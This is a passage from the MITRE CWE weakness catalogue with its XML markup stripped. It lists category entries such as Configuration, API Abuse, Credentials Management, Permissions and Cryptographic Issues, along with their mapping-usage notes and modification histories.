2023-04-25 + 4.11 + 2023-04-23 + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are typically introduced during the configuration of the software. + + + 14 + Server Misconfiguration + + + 15 + Application Misconfiguration + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1287]. This CWE entry may have become widely-used because of NIST's usage in NVD from 2008 to 2016 (see CWE-635 view, updated to the CWE-1003 view in 2016). Mapping is also Prohibited because this entry's status is Obsolete. + As of CWE 4.9, "Configuration" is beginning to be treated as an aspect of the SDLC in which a product is directed (by a human or automated process) to perform an insecure behavior. CWE mapping should be conducted by analyzing the weakness in the behavior that has been set by the configuration, such as those related to access control (descendants of CWE-284) or resource management (CWE-400), etc. + + + + + + Further discussion about this category was held over the CWE Research mailing list in early 2020. No definitive action has been decided. + This entry is a Category, but various sources map to it anyway, despite CWE guidance that Categories should not be mapped. In this case, there are no clear CWE Weaknesses that can be utilized. "Inappropriate Configuration" sounds more like a Weakness in CWE's style, but it still does not indicate actual behavior of the product. Further research is still required, however, as a "configuration weakness" might be Primary to many other CWEs, i.e., it might be better described in terms of chaining relationships. + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Detection_Factors + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Maintenance_Notes, References + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category has been deprecated. It was originally intended as a "catch-all" for input validation problems in technologies that did not have their own CWE, but introduces unnecessary depth to the hierarchy. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Other_Notes + + + CWE Content Team + MITRE + 2014-06-23 + updated Applicable_Platforms, Modes_of_Introduction, Other_Notes, Potential_Mitigations + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Modes_of_Introduction, Name, Potential_Mitigations, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Technology-Specific Special Elements + + + + This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Description, Maintenance_Notes, Name, Relationships, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Code + + + + This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. Weaknesses in this category were related to improper handling of data within protection mechanisms that attempt to perform neutralization for untrusted data. These weaknesses can be found in other similar categories. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Relationships + + + CWE Content Team + MITRE + 2009-12-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2011-06-01 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Related_Attack_Patterns, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2021-07-20 + updated References + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Cleansing, Canonicalization, and Comparison Errors + + + + This entry has been deprecated. It was originally used for organizing the Development View (CWE-699) and some other views, but it introduced unnecessary complexity and depth to the resulting tree. + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + Landwehr + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Description, Maintenance_Notes, Name, Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Source Code + + + + Weaknesses in this category are related to improper calculation or conversion of numbers. + + + + + + + + + + + + + + + INT01-PL + Use small integers when precise computation is required + CWE More Abstract + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1287]. This CWE ID may have become widely-used because of NIST's usage in NVD from 2008 to 2016 (see CWE-635 view, updated to the CWE-1003 view in 2016). + Most number-handling issues are probably descendants under Incorrect Calculation (CWE-682) or Incorrect Conversion between Numeric Types (CWE-681). + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Relationships + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are typically found in functionality that processes data. Data processing is the manipulation of input to retrieve or save information. + + + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Name, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Data Handling + + + + Weaknesses in this category are related to improper handling of sensitive information. + + + + + + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that are typically introduced during unexpected environmental conditions. According to the authors of the Seven Pernicious Kingdoms, "This section includes everything that is outside of the source code but is still critical to the security of the product that is being created. Because the issues covered by this kingdom are not directly related to source code, we separated it from the rest of the kingdoms." + + + + + + + + + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Maintenance_Notes, Name + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Environment + + + + This category has been deprecated. It was originally used for organizing weaknesses involving file names, which enabled access to files outside of a restricted directory (path traversal) or to perform operations on files that would otherwise be restricted (path equivalence). Consider using either the File Handling Issues category (CWE-1219) or the class Use of Incorrectly-Resolved Name or Reference (CWE-706). + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings, Type + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2012-05-11 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2013-02-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-02-18 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Description, Potential_Mitigations, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships, Type + + + CWE Content Team + MITRE + 2021-03-15 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Pathname Traversal and Equivalence Errors + + + + This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses that involve the software using an API in a manner contrary to its intended use. According to the authors of the Seven Pernicious Kingdoms, "An API is a contract between a caller and a callee. The most common forms of API misuse occurs when the caller does not honor its end of this contract. For example, if a program does not call chdir() after calling chroot(), it violates the contract that specifies how to change the active root directory in a secure fashion. Another good example of library abuse is expecting the callee to return trustworthy DNS information to the caller. In this case, the caller misuses the callee API by making certain assumptions about its behavior (that the return value can be used for authentication purposes). One can also violate the caller-callee contract from the other side. For example, if a coder subclasses SecureRandom and returns a non-random value, the contract is violated." + + + + + + + + + + + + + + + WIN30-C + Properly pair allocation and deallocation functions + CWE More Abstract + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-05-27 + updated Name, Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Description + + + CWE Content Team + MITRE + 2011-03-29 + updated Description, Name + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-05-03 + updated Observed_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Alternate_Terms, Common_Consequences, Description, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + API Abuse + Failure to Fulfill API Contract (aka 'API Abuse') + Failure to Fulfill API Contract ('API Abuse') + Improper Fulfillment of API Contract ('API Abuse') + + + + Functions that manipulate strings encourage buffer overflows. + + + Often Misused: Strings + + + SFP10 + Incorrect Buffer Length Computation + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Applicable_Platforms, Demonstrative_Examples, Relationships, White_Box_Definitions + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2020-06-25 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Software security is not security software. Here we're concerned with topics like authentication, access control, confidentiality, cryptography, and privilege management. + + + + + + + + + + + + + + + + Security Features + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + Consider mapping to weaknesses that are members of this Category. + + + + + + + 7 Pernicious Kingdoms + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Name, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Security Features + + + + Weaknesses in this category are related to the management of credentials. + + + + + + + + + + + + + + + + + + + + A3 + Broken Authentication and Session Management + CWE More Specific + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1287]. This CWE ID may have become widely-used because of NIST's usage in NVD from 2008 to 2016 (see CWE-635 view, updated to the CWE-1003 view in 2016). + Some weakness-oriented alternatives might be found under Improper Authentication (CWE-287) or keyword searches for credentials. + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Detection_Factors + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Name, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Credentials Management + + + + Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control. + + + Permissions, Privileges, and ACLs + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1287]. This CWE ID may have become widely-used because of NIST's usage in NVD from 2008 to 2016 (see CWE-635 view, updated to the CWE-1003 view in 2016). + Some weakness-oriented alternatives might be found as descendants under Improper Access Control (CWE-284). Note: use of CWE-284 is Discouraged; see CWE-284's Mapping Notes. + + + + + + This entry heavily overlaps other categories and has been marked obsolete. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Maintenance_Notes, References + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category occur with improper handling, assignment, or management of privileges. A privilege is a property of an agent, such as a user. It lets the agent do things that are not ordinarily allowed. For example, there are privileges which allow an agent to perform maintenance functions such as restart a computer. + + + + + + + + + + + + + + + + + + Privilege / sandbox errors + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + This can strongly overlap authorization errors. + A sandbox could be regarded as an explicitly defined sphere of control, in that the sandbox only defines a limited set of behaviors, which can only access a limited set of resources. + It could be argued that any privilege problem occurs within the context of a sandbox. + Many of the following concepts require deeper study. Most privilege problems are not classified at such a low level of detail, and terminology is very sparse. Certain classes of software, such as web browsers and software bug trackers, provide a rich set of examples for further research. Operating systems have matured to the point that these kinds of weaknesses are rare, but finer-grained models for privileges, capabilities, or roles might introduce subtler issues. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Relationship_Notes, Taxonomy_Mappings, Theoretical_Notes + + + CWE Content Team + MITRE + 2008-10-14 + updated Description, Research_Gaps, Theoretical_Notes + + + CWE Content Team + MITRE + 2009-12-28 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-11-08 + updated Detection_Factors, Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Name, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Privilege / Sandbox Issues + + + + Weaknesses in this category are related to improper assignment or handling of permissions. + + + + + + + + + + + + + + Permission errors + + + A2 + Broken Access Control + CWE More Specific + + + A10 + Insecure Configuration Management + CWE More Specific + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + Consider mapping to weaknesses that are members of this Category. + + + + + + Permissions are associated with a resource and specify which actors are allowed to access that resource and what they are allowed to do with that access (e.g., read it, modify it). Privileges are associated with an actor and define which behaviors or actions an actor is allowed to perform. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated References + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors + + + CWE Content Team + MITRE + 2017-11-08 + updated Affected_Resources, Detection_Factors, Functional_Areas, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships, Terminology_Notes + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Terminology_Notes + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category has been deprecated. It was originally intended as a "catch-all" for environment issues for technologies that did not have their own CWE, but it introduced unnecessary depth and complexity to the Development View (CWE-699). + + Prohibited + This CWE has been deprecated. It is also a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See the summary, which might have suggestions for other CWEs to consider. + + + + + + + + CWE Community + 2006-07-19 + Draft 3 + 2006-07-19 + Submitted by members of the CWE community to extend early CWE versions + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Description, Maintenance_Notes, Name, Type + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Technology-specific Environment Issues + + + + Weaknesses in this category are related to the design and implementation of data confidentiality and integrity. Frequently these deal with the use of encoding techniques, encryption libraries, and hashing algorithms. The weaknesses in this category could lead to a degradation of the quality data if they are not addressed. + + + + + + + + + + + + + + + + + Cryptographic Issues + + + + + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves [REF-1287]. This CWE ID may have become widely-used because of NIST's usage in NVD from 2008 to 2016 (see CWE-635 view, updated to the CWE-1003 view in 2016). + Some weakness-oriented alternatives might be found as descendants under Use of a Broken or Risky Cryptographic Algorithm (CWE-327) + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-07-27 + updated Maintenance_Notes, Relationship_Notes, Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationships + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Functional_Areas, References, Related_Attack_Patterns, Relationship_Notes + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Maintenance_Notes, References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to errors in the management of cryptographic keys. + + + + + + + + + Key Management Errors + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + Consider mapping to weaknesses that are members of this Category. + + + + + + This entry heavily overlaps other categories and has been marked obsolete. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Maintenance_Notes, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-03-29 + updated Observed_Examples + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Observed_Examples + + + CWE Content Team + MITRE + 2018-03-27 + updated Relationships + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Maintenance_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Weaknesses in this category are related to or introduced in the User Interface (UI). + + + + + + + + + + + + + (UI) User Interface Errors + + + + Prohibited + This entry is a Category. Using categories for mapping has been discouraged since 2019. Categories are informal organizational groupings of weaknesses that can help CWE users with data aggregation, navigation, and browsing. However, they are not weaknesses in themselves. + See member weaknesses of this category. + + + + + + User interface errors that are relevant to security have not been studied at a high level. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-01-19 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Mapping_Notes, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + This category represents one of the phyla in the Seven Pernicious Kingdoms vulnerability classification. It includes weaknesses related to the improper management of time and state in an environment that supports simultaneous or near-simultaneous computation by multiple systems, processes, or threads. According to the authors of the Seven Pernicious 